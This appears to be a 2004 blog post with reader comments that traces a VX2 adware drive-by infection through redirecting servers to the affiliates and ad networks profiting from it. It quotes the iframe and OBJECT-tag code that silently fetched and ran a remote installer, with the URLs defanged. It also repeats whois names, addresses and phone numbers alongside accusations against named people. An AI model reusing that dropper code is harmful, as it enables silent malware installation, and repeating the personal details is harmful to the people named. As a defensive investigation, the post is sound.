Follow the Money; or, why does my computer keep getting infested with spyware?

[EDIT] This particular post has generated a very large amount of email, and apparently is being read by a large number of people infected with VX2. As a result, I’ve edited it, to clean up typos and to add additional information about the exploits used, the way VX2 works, and the sources of the spyware scourge. New information is identified with [EDIT].

If you’re reading this post and you’re on a Windows computer, the odds are overwhelming–between 80% and 90%–that you are infected with at least one virus or spyware program, and the odds are very high that you’re infected with dozens or hundreds.

Yes, you. Even if you are technically literate, you have a firewall, and you never download suspicious attachments, you are almost certainly infected. There is lots and lots and lots of money in computer viruses and spyware, especially the variety that makes popup ads appear on your machine. The question I’ve always had, though, is who’s making all this money by infecting your computer?

A couple nights ago, Shelly’s computer became infected. Shelly’s technically savvy, the apartment we live in is on a closed private network with a hardware firewall between us and the Internet, and she also runs a software firewall on her computer, and she still became infected nonetheless.

I spent about six hours removing the infection, and also tracking down the source of the infection, and painstakingly backtracking all the popup ads that the adware displayed on her computer. My goal: Follow the money. Discover where the infection came from, and who was making money from it. The results were, to say the least, interesting.

If you don’t care about stuff like this, you can skip the rest of this message. If you’re curious about the mechanisms by which spyware and viruses work, who is responsible for them, why they’re so common, how they spread, and most important, who makes money by creating and releasing them:

Shelly’s computer started behaving strangely, taking a long time to boot and displaying popup ads whenever she launched Internet Explorer, late Wednesday afternoon. Running the anti-spyware program Ad-Aware revealed that the computer was infected with a very nasty bit of malware called VX2, first introduced to the Internet public by a company calling itself VX2, which has since become defunct. The VX2 program has continued to be developed and to become nastier, more destructive, and more malicious as time goes on; today’s VX2 is extremely sophisticated, highly destructive, and almost impossible to remove.

Ad-Aware and a similar program called Spybot Search & Destroy could see the infection, but could not remove it. VX2 remains memory-resident, even if its files are deleted, and constantly monitors attempts to get rid of it; if it is removed or the computer’s Registry is changed, this evil little bastard changes the Registry back and rewrites itself to disk under a different name. It also sets itself up as a critical system service (so it runs even when the computer is booted in safe mode), and cloaks itself so that it does not appear in the Task Manager. [EDIT]: Earlier versions of VX2 could only conceal themselves in the Task Manager under Windows 95/98/Me; VX2 Variant 3 appears to be able to conceal itself in the Task Manager under Windows NT/2000/XP as well.

Ad-Aware has a special plug-in module written especially to remove VX2. This plug-in confirmed that Shelly’s computer was infected with what it described as “VX2 Variant 3,” but even the plug-in could not remove the infection; it appears that Shelly had become infected with a brand-new VX2 variant, more cunning and more malicious than even the worst variant known to Ad-Aware.

But from where?

Now things get interesting. In following the source of the infection, I ended up in a virtual trip that went from Dallas, Texas, through servers in Russia and Nevada, and finally back to the source in Rosemount, Minnesota. Along the way, it involved a surprising number of big-name, supposedly reputable companies, all of whom are profiting either directly or indirectly from viruses and spyware.


Shelly’s computer first became infected when her browser visited the Web address “http://69.20.56.3/ normal/yyy12.html”. At the time I am writing this, this Web address is still active. *** WARNING *** WARNING *** WARNING I have put a space in this URL to keep people from clicking accidentally on it. Do NOT visit this URL if you are on a Windows machine and you’re using Internet Explorer. You WILL become infected. I don’t know what brought her to that site; it may have been a redirect, a browser hijack, even a maliciously constructed banner ad.

[EDIT]: The site infects a computer using an Explorer iFrame exploit. Put most simply, if a Web page contains an iFrame that points to another Web page containing an OBJECT tag, the file referenced in the OBJECT tag (in this case, a dropper for VX2) is downloaded and installed silently, without the user’s knowledge or consent. Versions of Internet Explorer prior to the version that shipped with Windows XP SP2 are all vulnerable; I have not tested the version of Explorer that shipped with XP SP2 or versions patched by subsequent security fixes. I do know that Microsoft has since closed several iFrame exploits. I do not know if this exploit is one of them.

The Web site at 69.20.56.3 is running on a computer whose ISP connection is provided by a company called Rackspace, a large and busy Texas-based ISP with international offices and a long history of supporting and condoning spam and other unethical behavior; in fact, Rackspace even has its own entire section on the Blackholes.us spam support blacklisting service.

So Rackspace is the first company profiting from the infection; they’re making money by providing Internet connections for the URL hosting the malware dropper. Remember the name Rackspace; we’ll be seeing it again later.

So. Moving along: The virus-dropping Web site at 69.20.56.3 is nothing but a simple redirector. It redirects to “http://213.159.98.203/ ads/banners/banner3.php?ID=1”. Again, I have put a space in this URL. Do NOT visit this URL if you are on a Windows machine and using a vulnerable version of Explorer; you WILL become infected. [EDIT]: This page is referenced by an iFrame from the preceding page, and contains an iFrame pointing to the next server in the chain, which contains the actual dropper; we’ll get to that in a moment.

This Web site is hosted on a server in Russia; the ISP is a Russian service called Linkey.ru. They are the second group of people in the chain making money from viruses and spyware, by hosting a virus dropper. I don’t know if they’re a knowing participant or just an innocent ISP who’s unknowingly hosting a virus dropper. [EDIT]: Additional information from a helpful reader on the news.admin.net-abuse.email newsgroup:
The Russian-hosted Web site is:
http://213.159.98.203/ = Adsavior.com
11/08/04 11:05:06 dns Adsavior.com
Adsavior.com NS (Nameserver) ns1.adsavior.biz
Adsavior.com NS (Nameserver) ns2.adsavior.biz
Adsavior.com A (Address) 213.159.98.203
mail.Adsavior.com A (Address) 213.159.98.209
ns1.adsavior.biz A (Address) 213.159.98.204
ns2.adsavior.biz A (Address) 213.159.98.208
Organization:
Adsavior Inc.
James Finlayson
#395-1027 Davie St.
Vancouver, BC V6E4L2
CA
Phone: 6046969057
Email: jamesinflames69@hotmail.com
Registrar Name….: Register.com
Registrar Whois…: whois.register.com
Registrar Homepage: http://www.register.com
Domain Name: ADSAVIOR.COM
Created on…………..: Thu, Sep 16, 2004
Expires on…………..: Fri, Sep 16, 2005
Record last updated on..: Mon, Oct 04, 2004
It appears that linkey.ru and IPs in the same general block as “Adsavior.com” are well known for Net abuse. Mr. Finlayson, another Canadian, appears to be deeply involved in this particular virus/adware gang as well.

Onward and upward: The Russian virus host itself is also nothing but a redirector. Clearly, the person responsible for the virus wants to put some distance between himself and the virus; we’ve already gone through two redirectors in two countries. The Russian Web site contains an Internet Explorer iFrame exploit which causes Internet Explorer to load a program from the URL “http://www.xzoomy.com/ stc.php?stid=007”. Once again, I have put a space in the URL; if you visit this Web site, and allow your browser to download the executable that it references, you’ll be infected with VX2.

Now we’re getting somewhere. The xzoomy.com Web site is a search engine that’s well-known in anti-virus and anti-spyware circles. Xzoomy.com makes a small profit every time someone uses their Web page to do a search; they have a long and ignoble history of attracting visitor through the use of spyware, adware, and viruses. They’ve been responsible for their own spyware/adware software, and they’ve got their hands in an Internet gambling site called “free scratch and win” as well. These guys are looking more and more like our scumbags, eh? This site is registered to:

XzoomY.COM
Mike Cass (domains@adscpm.com)
+1.2042984015
Fax: +1.0000000000
181 Coniston St
Winnipeg, MB R2H1P8
CA

So Mike Cass is up to his ears in this mess. Mike’s Web site, well-known for being the source of spyware and adware, is hosted by an ISP called Peer 1 Network, an outfit in Montreal known to be indifferent to spammers. Mike and Peer 1 Network are making money here–Peer 1 by hosting Mike’s Web site in spite of the fact that it’s known to be associated with adware and spyware, Mike because he makes money every time someone visits his site. But wait, there’s more!

The xzoomyy.com Web site is another redirector. It redirects to “http://www.2nd-thought.com/ files/install007.exe” (I’ve put a space in the URL); and it loads and executes the Windows program install007.exe from the 2nd-thought.com Web site by using an OBJECT tag. [EDIT]: This file, install007.exe, is the actual executable that installs the adware. If you’re using Explorer for Windows and you visit any of the pages before this in the chain, install007.exe downloads and runs silently without prompting you, because the OBJECT tag that references it is contained inside an iFrame. This is also why other browsers are safer; they don’t recognize the iFrame tag.

The program install007.exe loads and runs as soon as the browser hits that page; the computer’s owner never gets any warning and has no opportunity to stop it. As you may have guessed, install007.exe installs VX2 on the victim’s computer.

Note that all this–the numerous redirects, downloading the program from the 2nd-thought Web site, installing the VX2 virus–all happened automatically and silently; at no point is the computer owner aware of what is going on, and at no point does the computer owner know that a virus is being loaded onto his computer.

2nd-thought.com is the primary villain here. They are hosting the installer itself; they are the people actually placing VX2 on the victims’ computers without permission or notification. Let’s take a look-see and find out who these guys are:

Domain name: 2nd-thought.com

Registrant Contact:

Don Lativalle (abuse@2nd-thought.com)
+1.5198514015
Fax: +1.0000000000
3597 boul St-Jean
Dollard des Ormeaux, H9X2B5
CA

Well, lookit that, another Canuck. What is up with Canadian spyware and virus profiteers, eh? Does Canada have particularly lax computer-crime laws?

2nd-thought.com is hosted by Peer 1 Networks as well. 2nd-thought.com is also a well-known scourge on the Internet, notorious for releasing a spyware program that changes your home page to their page, and for redirecting search engine searches you do to porn sites. That’s two scumbags with long histories of Internet abuse, both hosted on Peer 1 Networks and both, apparently, now working together. Mike Cass, Don Lativalle, and Peer 1 Networks: three people or organizations with shady pasts and questionable ethics, three people or organizations who are apparently involved with loading VX2 onto Shelly’s computer.


So now we know how VX2 ended up on Shelly’s computer. We know what people are responsible, we know what businesses support and profit from them, and we know they’ve gone to a whole lot of trouble and effort to hide themselves. We know that the people, Mike Cass and Don Lativalle, have histories of releasing spyware and adware to infect people’s computers, we know they run for-profit Web sites, and we know that they have independently established histories of using dubious and unethical practices to get traffic to those Web sites. We know they’re both Canadian, we know they have found a Canadian ISP in Peer 1 Networks willing to turn a blind eye to outrageous network abuse, and we know that they appear to have teamed up to spread an extremely malicious variant of a program already known for being almost impossible to get rid of.

What’s left is discovering the why. What’s the mechanism by which they make money? How do they profit from infecting you with VX2? Where does the money come from, and where does it go?

For that, I had to turn to the actions that this VX2 variant takes once it’s infected the computer, and to the ads it serves up.


This particular strain of VX2 does two things. First, it carries a payload unusual for adware; it loads another adware program called Bargain Buddy. Bargain Buddy’s Web site is at cashbackbuddy.com, which is hosted by Globix, a Web-hosting company headquartered in the United Kingdom.

The cashbackbuddy.com Web site attempts to get people to deliberately infect themselves with the Bargain Buddy scumware by telling them “the new Software helps the end-user maximize his/her savings and gain cash back commissions from purchases made at all participating on-line and some offline merchants” (and so on, and so on). CashBackBuddy and its scumware is operated by an outfit called eXact Advertising:

eXact Advertising
101 W. 23rd Street, PMB 2392
New York, New York 10011
United States
646-223-1227

eXact Advertising owns a number of different Internet properties, including pay-for-placement search engines, Mail.com, a personals Web site called “luvbandit,” and so on.

The Bargain Buddy software is pretty straightforward: every now and then, it loads an ad on the victim’s computer. Each time an ad is served, eXact Advertising makes a few cents from the advertisers who pay for the ads. Some of this money goes to Bargain Buddy “referrers;” the rest is profit.

So what that means is that if I sign up with eXact Advertising, then I get you to put the Bargain Buddy adware on your computer, every time an ad pops up, the advertiser pays eXact Advertising some money, and eXact Advertising pays me some money.

eXact Advertising claims to be “opt-in;” they say the only way you’ll get Bargain Buddy is if you explicitly sign up and put it on your computer voluntarily. They lie, of course; the fact that they’re doing businesses with referrers such as Mike Cass and Don Lativalle, who use very sneaky ways indeed to get the software onto your computer, proves it. They pretend to be good guys helping consumers save money; in reality, they don’t care so long as people can be cajoled, tricked, or forced into installing their software, with or without their consent.


So. Now Shelly’s computer is infected with two adware programs: Bargain Buddy by eXact Advertising, who is paying the people responsible for the infection, and a custom version of VX2, which prevents itself from being removed easily, installs Bargain Buddy, and also serves ads on its own.

Now popup ads are popping up all over the place. Some of them are from eXact Advertising, a shady company that’s written its own custom adware. Some of them are from VX2 itself. It’s the latter ones, the ones that VX2 is generating, that are the most interesting.

VX2 brings in ads from, of all places, Revenue.net, a very large mainstream online advertising broker that serves up banner ads, popup and popunder ads, and contextual ads for a lot of big-name clients. Revenue.net does serve popup ads and popunder ads, primarily from Web sites rather than adware. The ads being brought in from the VX2 infection were being pulled from Revenue.net; the persons responsible for the VX2 infection were Revenue.net affiliates.

I fired off an email to Revenue.net, with the URLs of some of the popup ads being pulled in by the virus. Revenue.net, rather to my surprise, actually responded, and claimed that the affiliate code attached to the popup ads appearing on Shelly’s computer belonged to an outfit calling itself “look2me.com”.

Look2me.com is–surprise surprise–a Web advertising company that makes money from popup ads. Look2me.com is a Revenue.net affiliate; Look2me.com gets people to view ads produced by Revenue.net, the advertiser pays Revenue.net, who then pays a percentage of the take to look2me.com.

Look2me.com is hosted by…wait for it…Rackspace! Told you their name would pop up again.

Look2me.com is owned by:

NicTech Networks info@look2me.com
3860 W 150TH ST
Rosemount, Minnesota 55068
United States
866-705-2728

NicTech Networks also owns a dating service called “SimilarSingles.com”. Sound familiar? eXact Advertising, based in New York, is an Internet advertising company that serves popup ads on virus-infected computers and also owns an online dating service. NicTech Networks, based in Minnesota, is an Internet advertising company that serves popup ads on virus-infected computers and also owns an online dating service. Two well-known and unethical Canadians, Mike Cass and Don Lativalle, each with separate histories of profiting from adware and malware, are jointly responsible for a computer infection which serves popup ads from eXact Advertising and NicTech Networks. NicTech Networks is hosted by Rackspace; the initial point of infection of the virus is a Web site hosted by Rackspace.


Rackspace is looking pretty bad here. In fact, Rackspace and Peer 1 Networks are both obviously dirty; both are up to their elbows in hosting and providing services for people who make money by serving popup ads through viruses and malware. It’s hard to argue that either Rackspace or Peer 1 Networks is simply being duped by a client, particularly in light of the fact that emails to both outfits concerning this situation go unanswered, and in light of the fact that the virus-dropping Web site is still up three days after I’ve emailed the responsible hosts. [EDIT]: After complaining to both ISPs, I still have not had a response from either. As of this writing, neither Rackspace nor Peer1 has taken any action against the Web sites named in this report.

So. Advertisers pay eXact Advertising and Revenue.net. eXact Advertising and Revenue.net then go on to pay affiliates who have infected target computers with malware to serve up the ads. The affiliates host their virus-dropping Web sites, along with Web sites that profit in other ways from viruses and malware, on Canadian ISP Peer 1 Networks and American ISP Rackspace.com. The money goes from the advertisers to eXact Advertising and Revenue.net; some of this money then goes to the affiliates, who infect the computers with malware; some of the money the virus-spreaders make in turn goes to Peer 1 Networks and Rackspace, who turn a blind eye to what their clients are doing. But where does the money originate? Obviously, the advertisers are only buying ads because they think the ads will work; that means, somebody is clicking on these popup ads and buying the advertisers products.

But who on earth would spend money on an annoying popup ad? What could possibly induce someone to take out his wallet when everyone knows that virus-spawned popup ads are among the most annoying things on Earth?

Ah, that’s the pure genius of it–that’s the brilliance of the scheme, honed to a fine edge. The popup ads you get when you’re infected with VX2? They advertise…

…spyware removal and popup blocking tools.

342 thoughts on “Follow the Money; or, why does my computer keep getting infested with spyware?

  1. Great writeup. Makes it pretty obvious why one might want to consider using another browser, eh? (or, for the extreme, perhaps a different operating system? πŸ™‚

    • Yep. As a result of this problem, I think I’m installing another browser, possibly Firefox, on Shelly’s computer this evening.

      I use Windows, Linux, MacOS, and other operating systems–unfortunately, some applications (such as games) require using Windows. My primary machines are Mac and Linux systems, though; i try not to keep anything vital on my Windows machines, in case I have to wipe ’em. Unfortunately, Shelly doesn’t have that luxury.

      • I’m with you on that. Firefox all the way (both in Linux and MacOS) for me. Fortunately, I don’t have to deal with a Windows system. Strangely enough, I’ve never had a Windows system — went directly from MacOS to Linux, and have only recently strayed back, now that MacOS doesn’t suck nearly as much as it used to πŸ˜‰

        • I’m currently using FireFox, and it doesn’t make that big a difference, really. If I go a week or so without running SpyBot, when I finally do run it, it finds SKAJILLIONS of spyware. (Spywares?)

          I have it running automatically every night; almost every morning, it tells me it’s found five items. I don’t know if they’re the SAME five items that are simply resisting removal, or if I just pick them up on my usual daily rounds of websurfing.

          • I’ve been using firefox for a couple of months now and haven’t picked up a singe piece of spyware. None that spambot or adaware have picked up on anyway. With IE I was picking up about 40 a week.

            Perhaps there’s a setting that needs tweaking somewhere?

          • Most of the spyware you’re seeing is probably just cookies. Clear out the cookies in Firefox right before you run Spybot, and then see how much it comes up with.

          • Check out SpywareBlaster – it’ll stop IE and Firefox from bringing in new spyware/adware bots onto your computer in the first place. Either google it, or there’s a link inside of SpyBot (if ya question its authenticity), but it works awesomely.

          • I have five persistent DSO exploits that Spybot finds EVERY TIME. I am sure it’s the same infection.

            I almost never get new spyware infections since switching to FireFox.

            Is it possible you have an IE hijack that’s still running IE spyware installs even when you’re not using it?

          • If it’s DSO Exploit that keeps popping up, that’s a bug in Spybot. It flags an insecure registry value that Microsoft has long since patched, but then it changes it to a value that’s perfectly safe but isn’t the value it’s looking for, so it keeps finding it and fixing it wrong. Upgrade to the latest Spybot, the problem was fixed not too long ago. But it was never actually a risk as long as you’ve kept up with updates to Windows and IE.

            And yeah, I know your comment is old, but I just stumbled across this entry because someone linked to it in the spywareinfo.com forums. ^_^;

  2. Great writeup. Makes it pretty obvious why one might want to consider using another browser, eh? (or, for the extreme, perhaps a different operating system? πŸ™‚

  3. First of all, I’m going to do some investigating on my own. Like calling the local police station and inquiring about their dealings with computer crimes and what falls under the definition of such. See, it’s interesting — both Mike Cass and Don Lativalle have phone numbers that resolve to Rogers AT&T cellphones. Interestingly enough, despite Don’s address being on the outskirts of Montreal, his phone claims he’s my neighbour — out in London, ON. Not sure what that indicates, but just an interesting fact.

    I’d also be most curious to know the technical details of how you’ve traced it through that many hops. If you don’t mind sharing, of course.

    • Not at all!

      I found the initial point of infection–69.20.56.3–by looking in Shelly’s Explorer history file, which retains even redirects. From there, I visited the site on my MacOS X machine using Safari, which allows me to view the source code of a page even if the page has one of those damn stupid Javascript things designed to prevent me from doing so.

      That page’s source is nothing more than a single tag, without even HTML, HEAD, or BODY tags:

      IFRAME SRC=”http://213.159.98.203/ ads/banners/banner3.php?ID=1″ height=”0″ width=”0″ SCROLLING=no MARGINHEIGHT=0 MARGINWIDTH=0 FRAMEBORDER=0/ (note that I’ve inserted a space in the URL within the IFRAME tag).

      So I manually visited that page with Safari; its source is likewise a single iFrame tag:

      iframe src=http://www.xzoomy.com/ stc.php?stid=007 width=”1″ height=”1″ frameborder=”0″

      the source of THAT page is a single OBJECT tag, as follows:

      object id=install classid=”CLSID:13197ACE-6851-45c3-A7FF-C281324D5489″ codebase=”http://www.2nd-thought.com/ files/install007.exe” (mind the space in the URL, as usual).

      Install007.exe is, as you can guess, the actual executable for the malware.

      The rest was a matter of using dig, traceroute, and whois searches. Whois on “xzoomy.com” produced the name Mike Cass; whois on “2nd-thought.com,” the actual host of the malware dropper, prodiced the name Don Lativalle. Dig and traceroute turned up Rackspace and Peer 1 as the hosts of the named Web sites.

      Given the lengths to which they’ve gone to hide their involvement, using redirectors scattered all over the place, it’s not one bit surprising to me that they’re using cell phones as their contact phone numbers, or that their contact addresses in the Whois registry might not be real.

      • Viewing HTML Source Safely

        I think one of the safest ways to do the research you describe would be to use Lynx instead of anything graphical. Available for Linux and Windows (and working on a Mac port, it seems), it’s easy to just download the source and display it on the screen.

        lynx -source http://yoururlhere.tld/yadda/yadda/yadda/biginfection.html

        will dump the source code to the screen.

        Another item of interesting is using the -head option to just retrieve and display the header. For the first URL you listed (the start of the journey to infection):

        HTTP/1.1 200 OK
        Date: Tue, 09 Nov 2004 16:05:49 GMT
        Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_python/2.7.8 Python/1.5.2 mod
        _ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.7 mod_perl/1.26
        Last-Modified: Mon, 18 Oct 2004 03:00:17 GMT
        ETag: “330223-90-417331c1”
        Accept-Ranges: bytes
        Content-Length: 144
        Connection: close
        Content-Type: text/html

        Lynx can be found at http://lynx.browser.org/. And no, I’m not a developer; I’m just someone who gets a lot of utility out of the program.

        A very good writeup. Thanks for the information.

        — Matt

        • Re: Viewing HTML Source Safely

          That’s a most excellent suggestion. I’d like to see Lynx available for Macs, as I don’t feel comfortable doing this kind of research from a Windows box regardless of the type of browser, though I think I’m going to install Lynx on my Linux box this evening. It looks like a good tool for the arsenal. Thanks!

        • Re: Viewing HTML Source Safely

          Just a note:
          The head on that apache server shows that it’s quite out of date, and is subject to numerous vulnerabilities.

        • Re: Viewing HTML Source Safely

          (Edit…)
          One of the safest ways to view HTML code is to use something such as, say, telnet. That way, you see the code as it is.
          I’ve coded my own program, CodeFetch, that’ll allow the viewing of any HTML page – just enter the URL and go. It’s a simple thing I made in VB (No, it doesn’t use Inet, it uses Winsock).
          So far, I’ve had no problems with it (not that there really could be any, considering the way it works).

          Oops, I should’ve read the whole thing first… I forgot about Lynx’s -head option…

          • Re: Viewing HTML Source Safely

            Could you post the vb source for CodeFetch?
            I would like to know how to read http from vb.

          • Re: Viewing HTML Source Safely

            Mmh. Someone asked me to post the source code of CodeFetch, but I can’t reply to their comment yet (due to it still being screened), so I’ll just write my reply here.

            All you need is a Winsock control. Read the help for that control, it contains some valuable information on how to use and control it. Then all you need is to open a connection (TCP, port 80) and send the command and other HTTP headers:
            Winsock.SendData “GET ” & URL(1) & ” HTTP/1.1″ & vbCrLf
            Winsock.SendData “Host: ” & URL(0) & vbCrLf
            Winsock.SendData vbCrLf
            Other headers you can send are Accept, Cache-control, Connection, User-Agent, Host, etc.. Remember to end with a CR+LF combination (DON’T use vbNewLine) otherwise the server’ll sit there, waiting for the rest of the data (and possibly just close the connection on you). I suggest that you set both User-Agent (to the name of your app, along with version, notes, URL, etc.) and the Host (the domain you’re trying to reach – important, because otherwise you might, for example, get the index of http://www.yahoo.com instead of mail.yahoo.com).
            All data that you receive, you can just plop into a textbox of some kind.

            For more information, you should read the RFC for the HTTP protocol:
            http://www.google.ca/search?hl=en&q=RFC+HTTP

  4. First of all, I’m going to do some investigating on my own. Like calling the local police station and inquiring about their dealings with computer crimes and what falls under the definition of such. See, it’s interesting — both Mike Cass and Don Lativalle have phone numbers that resolve to Rogers AT&T cellphones. Interestingly enough, despite Don’s address being on the outskirts of Montreal, his phone claims he’s my neighbour — out in London, ON. Not sure what that indicates, but just an interesting fact.

    I’d also be most curious to know the technical details of how you’ve traced it through that many hops. If you don’t mind sharing, of course.

    • Unlikely. Knowing that someone has committed a crime and proving it in court are two diffeent things, especially in light of the fact that they appear to be in Canada and I’m in the US. It’s not even entirely clear that what they’re doing violates Canadian or US law, though clearly it should.

      What I’d like to do is send them a bill for the time it took me to clean up the infection. I doubt that’d work, though.

    • Yeah, as tacit said, unlikely. I’m a network systems analyst at a managed security services provider, and I can tell you from personal experience that spam and spyware does not get prosecuted; the FBI is just not interested in crimes that cause such little tangible damage. Now, if you can show that it infected a bank or a government institution and caused actual financial loss, then their ears perk up. That, or if there’s child porn involved. It’s scary how quickly the FBI will jump on a case involving child porn. But for general spyware and adware cases like described above, they won’t do anything. Very good writeup BTW.

    • I was thinking the same thing.

      I used to do something similar on the college library. I would trace back who installed software that shouldn’t be there. It eventually started to lead to a group of young men. They turned out to be crackers. They’d managed to gain root on a couple of our servers. The most we were able to do to them, though, was to ban them from the lab, since the dean was friends with one’s mother. *shrugs*

  5. when I take over the world, you will be appointed my minister of “hunting people down so I can have them tortured, maimed, then left bleeding from open wounds in a horribly dirty cell filled with infectious bacteria.”

    you are a good man, Franklin. Highly useful.

    • But I’m working on taking over the world myself! Muh as I would love that job, I think I’d rather rule the world with an iron fist on my own… πŸ™‚

  6. when I take over the world, you will be appointed my minister of “hunting people down so I can have them tortured, maimed, then left bleeding from open wounds in a horribly dirty cell filled with infectious bacteria.”

    you are a good man, Franklin. Highly useful.

        • Re: are we safe?

          Yes, though even if you use Firefox, it’s still important to run Windows Update on a regular basis. There are security vulnerabilities in Internet Explorer which can be exploited even if you are not using Explorer as your browser.

          • Re: are we safe?

            I showed the last redirect (starts object id=install) to the webmaster at my job and he said that ALL browsers would be vulnerable to this exploit. Would you be so kind as to explain how this exploit works in IE and why Firefox is safe.
            Thank you in advance,
            Joel Adams

          • Re: are we safe?

            The key behind the exploit is that in Explorer, it loads the “install007.exe” application without asking you first. It should load the application only after asking you, which is (I believe, though I have not tested it) what would happen in a different browser. Any browser can, in theory, load the installer, but not without your permission.

          • Re: are we safe?

            (Coming at you via ‘s LJ…)

            I’ve recently run into a spyware dropper that, although not silent, still has FF and all other ‘zilla browsers attempt to install spyware. Here’s a screenshot (hosted on my own web server):

            http://www.caspeed.com/lj04/webbug1.png

            The javascript that drops the spyware has a section expressly devoted to Netscape installs. If the user is clueless and clicks install anyways, they get the bug.

            It’s only a matter of time before Zilla family browsers have a serious hijacker written for them. Enough people will click the install button anyways that it will be worth the spammers effort to do so.

            More on this exploit attempt in my own blog at: http://www.livejournal.com/users/makovette/393159.html

            CYa!
            Mako

  7. I don’t know what brought her to that site; it may have been a redirect, a bgrowser hijack, even a maliciously-constructed banner ad.

    VX2 got onto my system through the MSN toolbar. It’s a stealth installer that can come in piggybacked on dozens of things. I’ve got two others, at the moment, that come in off of Yahoo and Google’s toolbars respectively.

    (Unfortunately, I can’t disable either of those as I need them to run testing on our software as our users install them all the T*!#)*&!#&(*#!%^) time. The only way I’ve gotten around their services is to leave Spybot’s agent running and it will tell you whether anything’s attempting to change the registry and running Webroot’s spyware software package that notifies you and allows you to disable it.

    My current programs for spyware that are running as agents:

    Ad-Aware (for removal only)
    SpyBot S&D (agent running)
    Pest Patron (agent running)
    Webroot’s Spy Sweeper (agent running)

    Just as FYI, since you probably know most of it. πŸ™‚

    • In this particular case, neither Ad-Aware nor Spybot S&D could remove the infection. Ad-Aware has a special plugin just for VX2, and the plugin identified “VX2 Variant 3” on the computer and claimed to remove it, but didn’t. That’s why I suspect that what this was is some new variant on VX2 that’s designed to evade current VX2 cleaners.

      I haven’t tried Pest patron or Spy Sweeper. I suppose I could reinfect the computer and give them a go, but all things considered, I’d rather not. πŸ™‚ It would, however, be helpful to know whether either of them can deal with this VX2 variant.

      • Typo

        I think that should be ‘Pest Patrol’ not patron. It isn’t freeware, so I haven’t gotten around to using it yet, but their website allows you to perform a scan on your system that catches stuff (like a particular IE toolbar I absolutely loathe) the AdAware and Spybot can’t. (I removed so much garbage from my parent’s computer I can’t be sure what did what, but anything that appends a gigantic ad to the top of your homepage when you start your browser, requiring you to scroll down to view the site, necessitates deaths instead of legal action.)

  8. I don’t know what brought her to that site; it may have been a redirect, a bgrowser hijack, even a maliciously-constructed banner ad.

    VX2 got onto my system through the MSN toolbar. It’s a stealth installer that can come in piggybacked on dozens of things. I’ve got two others, at the moment, that come in off of Yahoo and Google’s toolbars respectively.

    (Unfortunately, I can’t disable either of those as I need them to run testing on our software as our users install them all the T*!#)*&!#&(*#!%^) time. The only way I’ve gotten around their services is to leave Spybot’s agent running and it will tell you whether anything’s attempting to change the registry and running Webroot’s spyware software package that notifies you and allows you to disable it.

    My current programs for spyware that are running as agents:

    Ad-Aware (for removal only)
    SpyBot S&D (agent running)
    Pest Patron (agent running)
    Webroot’s Spy Sweeper (agent running)

    Just as FYI, since you probably know most of it. πŸ™‚

  9. Yep. As a result of this problem, I think I’m installing another browser, possibly Firefox, on Shelly’s computer this evening.

    I use Windows, Linux, MacOS, and other operating systems–unfortunately, some applications (such as games) require using Windows. My primary machines are Mac and Linux systems, though; i try not to keep anything vital on my Windows machines, in case I have to wipe ’em. Unfortunately, Shelly doesn’t have that luxury.

  10. Not at all!

    I found the initial point of infection–69.20.56.3–by looking in Shelly’s Explorer history file, which retains even redirects. From there, I visited the site on my MacOS X machine using Safari, which allows me to view the source code of a page even if the page has one of those damn stupid Javascript things designed to prevent me from doing so.

    That page’s source is nothing more than a single tag, without even HTML, HEAD, or BODY tags:

    IFRAME SRC=”http://213.159.98.203/ ads/banners/banner3.php?ID=1″ height=”0″ width=”0″ SCROLLING=no MARGINHEIGHT=0 MARGINWIDTH=0 FRAMEBORDER=0/ (note that I’ve inserted a space in the URL within the IFRAME tag).

    So I manually visited that page with Safari; its source is likewise a single iFrame tag:

    iframe src=http://www.xzoomy.com/ stc.php?stid=007 width=”1″ height=”1″ frameborder=”0″

    the source of THAT page is a single OBJECT tag, as follows:

    object id=install classid=”CLSID:13197ACE-6851-45c3-A7FF-C281324D5489″ codebase=”http://www.2nd-thought.com/ files/install007.exe” (mind the space in the URL, as usual).

    Install007.exe is, as you can guess, the actual executable for the malware.

    The rest was a matter of using dig, traceroute, and whois searches. Whois on “xzoomy.com” produced the name Mike Cass; whois on “2nd-thought.com,” the actual host of the malware dropper, prodiced the name Don Lativalle. Dig and traceroute turned up Rackspace and Peer 1 as the hosts of the named Web sites.

    Given the lengths to which they’ve gone to hide their involvement, using redirectors scattered all over the place, it’s not one bit surprising to me that they’re using cell phones as their contact phone numbers, or that their contact addresses in the Whois registry might not be real.

  11. Unlikely. Knowing that someone has committed a crime and proving it in court are two diffeent things, especially in light of the fact that they appear to be in Canada and I’m in the US. It’s not even entirely clear that what they’re doing violates Canadian or US law, though clearly it should.

    What I’d like to do is send them a bill for the time it took me to clean up the infection. I doubt that’d work, though.

  12. But I’m working on taking over the world myself! Muh as I would love that job, I think I’d rather rule the world with an iron fist on my own… πŸ™‚

  13. In this particular case, neither Ad-Aware nor Spybot S&D could remove the infection. Ad-Aware has a special plugin just for VX2, and the plugin identified “VX2 Variant 3” on the computer and claimed to remove it, but didn’t. That’s why I suspect that what this was is some new variant on VX2 that’s designed to evade current VX2 cleaners.

    I haven’t tried Pest patron or Spy Sweeper. I suppose I could reinfect the computer and give them a go, but all things considered, I’d rather not. πŸ™‚ It would, however, be helpful to know whether either of them can deal with this VX2 variant.

  14. I’m with you on that. Firefox all the way (both in Linux and MacOS) for me. Fortunately, I don’t have to deal with a Windows system. Strangely enough, I’ve never had a Windows system — went directly from MacOS to Linux, and have only recently strayed back, now that MacOS doesn’t suck nearly as much as it used to πŸ˜‰

  15. Spectacular bit of netrunning. This is like the game Uplink, only real. πŸ™‚

    Magnificently done, sir. If, despite my efforts, you *do* manage to conquer the world, I think I’d like to apply for the job of leading your strike team to burn these people to the ground.

  16. Spectacular bit of netrunning. This is like the game Uplink, only real. πŸ™‚

    Magnificently done, sir. If, despite my efforts, you *do* manage to conquer the world, I think I’d like to apply for the job of leading your strike team to burn these people to the ground.

          • Re: Nice.

            They will let him slide as long as nobody complains. Spammers and net-assholes should be exposed to the light of day in any way possible, but LJ protects them. IN LJ Abuse’s opinion, just revealing the first and last NAME of someone else is a TOS violation – never mind the address, phone, whatever.

            I’d heard that LJ Abuse was a bunch of power-mad idiots before – but the people screaming were abusive themselves. Then this happened: http://www.cetan.com/wordpress/index.php?p=55 and the same guy got me suspended.

          • Re: Nice.

            Interesting writeup. If the LJ TOS can be interpreted in this way, then a post such as “George Bush is a lousy president” violates the LJ TOS.

